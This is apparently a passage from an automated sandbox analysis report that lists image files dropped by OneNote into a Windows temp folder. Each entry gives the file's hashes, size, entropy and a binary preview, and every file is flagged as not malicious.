                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{4B5A3C0A-63BD-4ABE-BA5E-406249425D6A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{4D337626-CB77-4F1D-ABF5-56D4BF2EA287}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2033
                                                                                                  Entropy (8bit):6.8741208714657
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                  MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                  SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                  SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                  SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

                                                                                                  C:\Users\user\AppData\Local\Temp\{4EBFF15F-49AA-4919-95B9-C0F0E7405C35}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Temp\{4F462F1F-6294-4F05-B59D-C088F192EC76}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):49224
                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                  Malicious:false
                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                  C:\Users\user\AppData\Local\Temp\{51B120C3-4D73-4C2A-B0BD-E41ECB3E47C3}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12824
                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                  C:\Users\user\AppData\Local\Temp\{51D22235-F284-4016-91DD-E3E86C3C1B02}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):647
                                                                                                  Entropy (8bit):6.854433034679255
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                  MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                  SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                  SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                  SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{5317D8D3-A2F1-4F95-AC12-9DDC5B5AB1D4}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Temp\{5357C036-0BCF-4437-B672-3147CC9C4A35}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{53738069-D405-4927-A90D-6BABD8D58D48}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):784
                                                                                                  Entropy (8bit):6.962539208465222
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                  MD5:14105A831FE32590E52C2E2E41879624
                                                                                                  SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                  SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                  SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................

                                                                                                  C:\Users\user\AppData\Local\Temp\{54850FE9-9A15-478B-AA6F-E866B051F19C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Temp\{551F58EC-2973-4AF7-AB86-C38DAEE726CB}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Temp\{597D9283-B7F3-4A86-925A-D8DD8101C2EB}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):129887
                                                                                                  Entropy (8bit):7.8877849553452695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                  MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                  SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                  SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                  SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

                                                                                                  C:\Users\user\AppData\Local\Temp\{59E0346D-7479-4A56-89F7-F1B49E60016E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1717
                                                                                                  Entropy (8bit):7.154087739587035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                  MD5:943371B39CA847674998535110462220
                                                                                                  SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                  SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                  SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

                                                                                                  C:\Users\user\AppData\Local\Temp\{5AFB20EC-E092-44FD-8095-A0C07D6ACB78}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
